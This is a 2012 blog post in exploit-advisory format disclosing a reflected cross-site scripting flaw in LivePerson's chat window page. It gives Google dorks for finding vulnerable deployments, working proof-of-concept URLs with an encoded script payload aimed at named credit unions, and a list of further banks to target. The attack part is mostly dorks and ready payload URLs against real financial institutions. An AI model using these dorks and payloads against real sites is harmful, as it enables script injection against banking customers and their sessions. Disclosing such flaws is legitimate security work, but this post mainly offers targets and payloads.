miercuri, 14 martie 2012

LivePerson Cross Site Scripting

# Exploit Title: LivePerson Cross Site Scripting
# Date: 15.03.2012
# Author: Sony
# Software Link: http://liveperson.com/
# Google Dorks: inurl:/window/top.asp?site= or inurl:/window/main.asp?site=
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/03/liveperson-cross-site-scripting.html
..................................................................

When you use google dorks click on "If you like, you can repeat the search with the omitted results included."

Well, yeah, we can see Cross Site Scripting in LivePerson.

What is LivePerson?

http://en.wikipedia.org/wiki/LivePerson

Today I spoke with tech support and asked who uses the LivePerson:

The fact that we currently have over 8,500 clients, including many Fortune 500 companies such as Verizon, Adobe, Cisco, Estee Lauder, Home Depot, Neiman Marcus, Panasonic, Bank of America, Chase, HSBC, Microsoft, HP, IBM, Hoovers and Citibank, is testimony to the quality of service, security and support we provide our customers. (c) Support

But well, now demo:

Safe Credit Union
https://www.safecu.org/

http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475[our xss is here]&page=&loginsso=

What is 68511475? Site ID.




http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=

American Airlines Federal Credit Union

https://www.aacreditunion.org/home.aspx

https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp?site=LPaaefcu_mbrsrvs%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=


More?

Use Google Dorks. We can see in the Google Dorks:

Busey Bank
http://en.wikipedia.org/wiki/Busey_Bank (wow,1868)

Del Norte Credit Union
https://www.dncu.org/

San Diego Metrpolitan Credit Union
https://www.sdmcu.org/home/home

Bank Financial
https://www.bankfinancial.com/home/home

Baton Rouge Telco Federal Credit Union
http://www.brtelco.org/home/accounts

etc..
Publicat de Sony la 22:41
Etichete: ,

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.